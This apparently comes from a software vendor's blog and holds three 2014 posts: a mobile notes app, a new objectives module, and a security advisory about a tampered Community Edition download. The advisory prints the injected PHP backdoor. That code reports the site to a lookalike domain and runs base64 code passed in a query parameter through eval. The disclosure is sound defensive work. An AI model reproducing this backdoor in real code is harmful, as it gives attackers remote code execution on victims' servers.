A look at Liquid Office’s mobile app for Feng Office: Liquid Notes

11/21/2014

Mobile project management requires a good understanding of what needs to be done, when it needs to be done and how one’s time can be organized in the best possible manner to achieve this. The “best possible manner” is a very personal statement that will fit each individual differently. For some, “best” refers to spending as much time as possible with family while for others, it means maximizing profits in the work space. As different as these views might sound, they both share the same goal: to use working time as efficiently as possible!

Mobile project management raises efficiency by using otherwise idle time productively; above all time during our daily commute, like waiting at the bus station, at the doctor’s office or even when an emergency rises and you are not in the office.

For people that are in constant idea process, there is nothing worse than having a bright idea but nowhere to write it down, structure it and put it into the right context. Nowadays, at least one mobile device is always at hand. With simple functionality, such as the ability to dictate, mobile devices turn into idea savers which save you a great deal of money and frustration.

Liquid Office, our developing partner from Austria, has created Liquid Notes, an application 100% compatible with Feng Office that accomplishes all of the above into one useful app.

Liquid Notes helps you manage your Feng Office notes on your mobile, and can be downloaded for both Android and iOS users.
Here are some of the features of Liquid Office:

  • The ability to create new notes wherever you are, without the hassle of having to wait for a computer.
  • Read, sort and filter your existing notes, in case you need information in an emergency situation where waiting to get to the office is simply not an option.
  • Classify new and existing notes to specific workspaces, to maintain organization within your Feng Office account.
  • Delete notes you no longer need right from your mobile device with just one simple finger swipe.

What’s in future for Liquid Office?

Liquid Office is planning to come up with additional apps in the Liquid Office Suite by the summer of 2015.

They are also working in parallel on a completely refreshed synchronization architecture, which will allow for off-line, as well as real-time synchronization. Real-time synchronization will answer the big question of document management, namely whose changes are to be taken over. Real-time synching also allows for even smoother work-flows in the future.

Community Edition: please update your installation to the latest version. Version 2.7.1.1 could be infected

11/20/2014

A few weeks ago our blog was hacked with one concrete purpose: to modify the download link for what was the latest released version.

This resulted in some users downloading an infected copy of Feng Office version 2.7.1.1

Affected installations

The link modified the download destination and inserted a local file to download an infected version 2.7.1.1 of the Community Edition.

Installations running a different version, or a 2.7.1.1 downloaded from Sourceforge are not affected.

Recommended Measures

The most effective way to be 100% sure is to download and update to the latest version.

The attack

The infected version was uploaded, and a fake download link was put on our website, making use of an exploit on our blog engine (WordPress).

We have since removed all infected files from our website, and resolved the Apache settings allowing the security exploit.

The infection was introduced on the files “init.php” “environment/environment.php”, on line 22. The infected code looks like this:

In init.php:

file_get_contents('http://sourceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));

In environment.php:

if(!ini_get('session.auto_start') || (strtolower(ini_get('session.auto_start')) == 'off')) {

if ( !isset($_GET['avoid_session']) || (isset($_GET['avoid_session']) && !$_GET['avoid_session']) ){
session_start(); // Start the session
}
}

file_get_contents('http://sourrceforge.net/raport.php?site='.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);

include_once ENVIRONMENT_PATH . '/classes/Env.class.php';

...
if(!empty($_GET['lal']))eval(base64_decode($_GET['lal']));

We would like to thank the two users who detected the issue and reported it to our team.

We should have been quicker to process the reports and to issue this post. Please accept our apologies for not being faster to publish this information; specially if your installation was affected.

Hopefully we will handle it better if a similar attack happens again.

Also, if you download the Community Edition, please make sure to download through Sourceforge, which still is our official channel for distributing the Community Edition.

Another step in full PMI Professional Project Mangament: the new ‘Objectives’ Module

10/24/2014

Hi Everyone!

We have another amazing new feature for Feng Office that we are sure you are going to love:
The New Objectives Module, a great tool to help Project Managers define and keep track of different objectives within your organization or individual projects.

You will be able to create your own customized objectives to manage different goals for each project, client or any work item with goals.

Some of the things you will be able to set with your customized objectives are:

  • Objective Description: To further explain what you plan on achieving.
  • Initial, Intermediate and Final Objective Values to show towards what you want to work for.
  • Start and End Dates, to make sure you achieve these objectives in effective time.
  • Current Value, to show where you are starting.

Once your new objective is created, you will be able to do the following:

  • Add Subscribers to keep other users updated on how your objective is going.
  • Edit your Objective in case you want to make changes to it.
  • Post comments, as reminders or notes of anything regarding the objective.
  • Link objects of relevance to the objective, for quick access to them.

We hope you enjoy the new objectives module, and remember to follow us on Facebook to keep updated on new improvements arriving very soon!!

If you have any comments or feedback on this new module (or anything about Feng Office itself), feel free to comment below or contact us here.
